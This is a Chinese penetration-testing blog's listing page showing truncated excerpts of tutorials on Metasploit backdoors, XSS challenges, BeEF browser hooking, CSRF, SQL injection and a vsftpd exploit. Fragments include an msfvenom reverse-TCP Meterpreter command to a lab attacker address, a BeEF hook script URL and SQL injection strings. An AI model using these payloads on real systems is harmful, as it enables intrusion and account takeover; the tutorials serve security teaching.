龙年吉祥|leon的博客
最新发布第3页
Metasploit后门渗透(三)|leon的博客

Metasploit后门渗透(三)

1.1 后门制作 1.1.1 使用编码器生成后门 1.1.1.1 使用一个编码器生成后门 [cce lang='bash']# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.180 L...
XSS漏洞-手动挖掘(三)|leon的博客

XSS漏洞-手动挖掘(三)

1.1 Stage 5 限制输入长度注入XSS http://xss-quiz.int21h.jp/stage--5.php?sid=4558a6085bab4b45184aab2e57fb77ae14e96786 1.1.1 页面分析 1.1.1.1  分析过程 提示信息:文本框长度限制 查看...
Leon的博客的头像|leon的博客Leon的博客2年前
2481
XSS漏洞-XSS攻击实例(九)|leon的博客

XSS漏洞-XSS攻击实例(九)

1.1 使用beef劫持用户浏览器 1.1.1 新建hook并启动apache [cce lang='bash']# vim /var/www/html/beef-xss.html <html> <head> <script src='http://192.168.10.180:3000/hook.j...
Leon的博客的头像|leon的博客Leon的博客2年前
2500
Web渗透-CSRF漏洞(一)|leon的博客

Web渗透-CSRF漏洞(一)

1.1 CSRF原理 1.1.1 csrf简单理解 假设用户已经保存某网站的登录信息,下次登录不需要认证,此时黑客构造一个访问该站点的链接并添加如:修改密码、转账等操作的参数,用户点击链接后黑客构造的...
SQL注入-GET方式SQL注入(二)|leon的博客

SQL注入-GET方式SQL注入(二)

1.1 SQL盲注 1.1.1 布尔注入 基于布尔的判断是根据我们构造语句返回的True或者False来判断数据内容。 布尔型有多种写法: and 1=1 简写and 1 and 1=2 简写and 0 注意:简写时只有and 0为假,非0...
SQL注入-SQL注入介绍|leon的博客

SQL注入-SQL注入介绍

1.1 SQL注入原理 用户登录的基本SQL语句:select * from users where username = '用户输入的用户名'and password = '用户输入的密码' 用户输入的内容是可控的,例如我们可以在用户名中输入' or...
Leon的博客的头像|leon的博客Leon的博客2年前
2560
XSS漏洞-手动挖掘(四)|leon的博客

XSS漏洞-手动挖掘(四)

1.1 Stage 9 UTF-7编码注入XSS http://xss-quiz.int21h.jp/stage_09.php?sid=e65bbb1a82573cd9e16ad710a7d7a259226deecf 因为现在都使用UTF-8编码且没有ie7的环境而且当前漏洞在实际场景中几乎...
Leon的博客的头像|leon的博客Leon的博客2年前
2591
SQL注入-POST方式SQL注入(三)|leon的博客

SQL注入-POST方式SQL注入(三)

1.1 HTTP头注入 我们可以使用报错注入的方式进行,报错注入可以使用以下函数进行测试: floor函数: floor(rand(0)*2) 利用分组时生成的虚拟表出现主键冲突,报出错误信息 extractvalue函数:ex...
Metasploit实例-FTP漏洞(九)|leon的博客

Metasploit实例-FTP漏洞(九)

1.1.1 攻击2.3.4版本FTP服务 1.1.1.1 扫描FTP版本 参见 FTP扫描章节 1.1.1.2 查找漏洞攻击模块 msf6 > search vsftpd type:exploit 1.1.1.3 使用和配置攻击模块 [cce lang='bash']msf6 > ...
XSS漏洞-XSS攻击方法总结(六)|leon的博客

XSS漏洞-XSS攻击方法总结(六)

1.1 XSS攻击常用编码 1.1.1 URL编码 url的设计者考虑到安全传输问题,防止url字符丢失,所以选用了相对较小的通用的安全字母表。另一方面url的设计者希望url是完整的,有时候需要url中包含除去...
Leon的博客的头像|leon的博客Leon的博客2年前
2730